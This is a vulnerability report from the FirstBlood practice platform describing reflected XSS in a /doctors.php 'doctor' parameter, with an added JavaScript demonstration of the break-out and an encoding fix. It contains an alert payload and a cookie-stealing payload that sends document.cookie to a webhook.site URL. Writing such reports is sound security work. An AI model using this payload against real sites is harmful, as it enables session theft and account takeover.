FirstBlood-#1127 — Reflected XSS
This issue was discovered on FirstBlood v3
On 2022-12-08, pichik Level 4 reported:
Hello zseano,
Hope you are doing well, and thanks for the next event.
My first bug is a reflected XSS in the /doctors.php
endpoint. There is a parameter, doctor,
which is reflected in between <script> tags.
Didn't find any better impact yet, so reporting just a simple alert.
We just need to escape ' and separate our code, so it won't throw an error.
Here is a payload with a simple alert: ';alert(1);'
POC LINK:
POC SCREEN:
IMPACT
As I found a way in, I am increasing the impact for this bug as it can be used in the same way as my #1335
report.
An attacker can use this bug to append cookies to a URL, send them to his server and steal the accounts of doctors.
Payload:
doctor=%27;window.location.href=%27https://webhook.site/[attacker-id]?%27%2Bdocument.cookie;%27
ACCOUNT TAKEOVER POC LINK:
Remediation:
HTML-encoding user-entered input should prevent XSS easily.
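The break-out and the remediation described in the report, as an added example that is not part of the report or of the FirstBlood code: it models the reflection of `doctor` into a quoted string inside `<script>`, contrasts raw concatenation with JS-string-context encoding, and evaluates each rendered script with a stubbed `alert()` so the difference is observable without a browser. The function names and the template shape are assumptions, not the site's actual code.

```javascript
// Added example (not the report's or FirstBlood's code): models the
// /doctors.php reflection of `doctor` into a quoted JS string inside <script>,
// then contrasts naive concatenation with context-aware encoding.

// The payload from the report, used here as constructed test input.
const PAYLOAD = "';alert(1);'";

// Vulnerable rendering (assumed shape): the raw value is concatenated into a
// single-quoted literal. A value containing ' closes the literal and ; starts
// a new statement, which is exactly what ';alert(1);' exploits.
function renderVulnerable(doctor) {
  return `<script>var doctor = '${doctor}';</script>`;
}

// JS-string-context encoder: JSON.stringify escapes quotes, backslashes and
// control characters; the extra replacements cover a literal </script> inside
// the value (which would end the element) and the U+2028/U+2029 line
// terminators, which JSON leaves as-is.
function encodeForScript(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Hardened rendering: the encoder supplies the quotes, so the template has none
// and the attacker-controlled value can never leave the string literal.
function renderSafe(doctor) {
  return `<script>var doctor = ${encodeForScript(doctor)};</script>`;
}

// Extract the first <script> body and evaluate it as a function body with
// alert() bound to a counter. The appended return exposes the value that
// `doctor` ended up holding, so a break-out shows up as alertFired === true.
function runInline(html) {
  const body = html.match(/<script>([\s\S]*?)<\/script>/)[1];
  let alerts = 0;
  const alertStub = () => { alerts += 1; };
  const doctor = new Function("alert", body + "\nreturn doctor;")(alertStub);
  return { alertFired: alerts > 0, doctor };
}
```

With `PAYLOAD`, `runInline(renderVulnerable(PAYLOAD))` reports the stubbed alert firing, while `runInline(renderSafe(PAYLOAD))` leaves `doctor` equal to the original string with no alert.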
P3 Medium
Endpoint: /doctors.php
Parameter: doctor
Payload: ';alert(1);'
FirstBlood ID: 47
Vulnerability Type: Reflective XSS
The endpoint /doctors.php is vulnerable to reflective XSS via the ?doctor= parameter